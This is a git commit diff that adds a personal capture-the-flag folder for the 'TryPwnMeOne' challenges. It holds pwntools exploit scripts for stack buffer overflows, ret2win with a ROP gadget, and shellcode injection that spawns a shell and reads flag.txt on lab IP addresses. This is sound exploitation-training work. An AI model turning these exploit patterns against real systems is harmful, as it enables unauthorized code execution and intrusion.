initial commit

2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
--- a/CTF/TryPwnMeOne/NotSpecified/notspecified
+++ b/CTF/TryPwnMeOne/NotSpecified/notspecified
--- a/CTF/TryPwnMeOne/RandomMemories/.gdb_history
+++ b/CTF/TryPwnMeOne/RandomMemories/.gdb_history
@@ -0,0 +1,2 @@
+vmmap
+vmmap
--- a/CTF/TryPwnMeOne/RandomMemories/random
+++ b/CTF/TryPwnMeOne/RandomMemories/random
--- a/CTF/TryPwnMeOne/RandomMemories/test.py
+++ b/CTF/TryPwnMeOne/RandomMemories/test.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.update(os="linux", arch="amd64", log_level="error")
+context.binary = binary = ELF("./random", checksec=False )
+
+r = process()
+gdb.attach(r)
+
+win_function_address = binary.symbols["win"]
+
+payload = b"A" * 256                        # offset to the RBP
+payload += b"B" * 8                         # overwrite the RBP
+payload += p64(win_function_address)        # address of the win function
+
+r.recvuntil(b"Return to where? : \n")
+r.sendline(payload)
+r.recvuntil(b"ok, let's go!\n\n")
+r.interactive()
--- a/CTF/TryPwnMeOne/TheLibrarian/ld-linux-x86-64.so.2
+++ b/CTF/TryPwnMeOne/TheLibrarian/ld-linux-x86-64.so.2
--- a/CTF/TryPwnMeOne/TheLibrarian/libc.so.6
+++ b/CTF/TryPwnMeOne/TheLibrarian/libc.so.6
--- a/CTF/TryPwnMeOne/TheLibrarian/thelibrarian
+++ b/CTF/TryPwnMeOne/TheLibrarian/thelibrarian
--- a/CTF/TryPwnMeOne/TryExecMe/exploit.py
+++ b/CTF/TryPwnMeOne/TryExecMe/exploit.py
@@ -0,0 +1,20 @@
+#!/bin/python3
+
+from pwn import *
+
+context.update(os="linux", arch="amd64", log_level="error")
+r = remote("10.10.111.44", 9005)
+
+payload = asm(shellcraft.sh())
+
+r.recvuntil(b"Give me your shell, and I will execute it: \n")
+
+r.sendline(payload)
+
+r.recvuntil(b"Executing Spell...\n\n")
+
+r.sendline(b"cat flag.txt")
+
+print(r.recvline().decode())
+
+r.close()
--- a/CTF/TryPwnMeOne/TryExecMe/tryexecme
+++ b/CTF/TryPwnMeOne/TryExecMe/tryexecme
--- a/CTF/TryPwnMeOne/TryOverFlowMe1/exploit.py
+++ b/CTF/TryPwnMeOne/TryOverFlowMe1/exploit.py
@@ -0,0 +1,16 @@
+#! /bin/python3
+
+from pwn import *
+
+context.log_level = 'error'
+
+r = remote("10.10.111.44", "9003")
+
+payload = b"A" * 44
+payload += p64(1)
+
+r.recvuntil(b"Please go ahead and leave a comment :\n")
+r.sendline(payload)
+
+print(r.recvline().decode())
+r.close()
--- a/CTF/TryPwnMeOne/TryOverFlowMe1/overflowme1
+++ b/CTF/TryPwnMeOne/TryOverFlowMe1/overflowme1
--- a/CTF/TryPwnMeOne/TryOverFlowMe2/exploit.py
+++ b/CTF/TryPwnMeOne/TryOverFlowMe2/exploit.py
@@ -0,0 +1,13 @@
+#!/bin/python3
+
+from pwn import *
+
+r = remote("10.10.111.44", 9004)
+
+payload = b"A" * 76
+payload += p32(0x59595959)
+
+r.recvuntil(b"Please go ahead and leave a comment :\n")
+r.sendline(payload)
+print(r.recvline().decode())
+r.close()
--- a/CTF/TryPwnMeOne/TryOverFlowMe2/overflowme2
+++ b/CTF/TryPwnMeOne/TryOverFlowMe2/overflowme2
--- a/CTF/TryPwnMeOne/TryRetMe/exploit.py
+++ b/CTF/TryPwnMeOne/TryRetMe/exploit.py
@@ -0,0 +1,23 @@
+from pwn import *
+
+context.update(os="linux", arch="amd64", log_level="error")
+context.binary = binary = ELF("./tryretme", checksec=False)
+
+r = remote("10.10.170.21", 9006)
+
+rop = ROP(binary)
+ret = rop.find_gadget(["ret"])[0]
+win_function_address = binary.symbols["win"]
+
+payload = b"A" * 256
+payload += b"B" * 8
+payload += p64(ret)
+payload += p64(win_function_address)
+
+r.recvuntil(b"Return to where? : \n")
+r.sendline(payload)
+r.recvuntil(b"ok, let's go!\n\n")
+
+r.sendline(b"cat flag.txt")
+print(r.recvline().decode())
+r.close()
--- a/CTF/TryPwnMeOne/TryRetMe/tryretme
+++ b/CTF/TryPwnMeOne/TryRetMe/tryretme
--- a/CTF/TryPwnMeOne/materials-TryPwnMeOne-final-1724815516655.zip
+++ b/CTF/TryPwnMeOne/materials-TryPwnMeOne-final-1724815516655.zip